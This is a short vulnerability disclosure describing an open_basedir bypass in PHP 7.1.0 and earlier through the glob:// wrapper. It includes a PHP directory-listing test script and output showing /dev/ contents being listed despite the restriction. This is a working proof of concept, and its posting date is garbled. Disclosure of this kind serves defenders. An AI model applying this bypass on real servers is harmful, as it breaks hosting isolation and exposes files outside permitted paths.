PHP 7.1.0 and prior open_basedir bypass through glob wrapper
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP 7.1.0 and prior open_basedir bypass through glob wrapper</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># ./php -v PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG ) Copyright (c) 1997-2016 The PHP Group Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies Test script: --------------- <?php if ($dh = opendir($argv[1])) { while (($file = readdir($dh)) !== false) { echo "$file "; } closedir($dh); } Expected result: ---------------- Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2 Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2 Actual result: -------------- # ./php bypass.php "/dev/" Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2 Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2 # ./php bypass.php "glob:///dev/*" MAKEDEV apm apmctl arandom audio audio0 audio1 </BODY></HTML>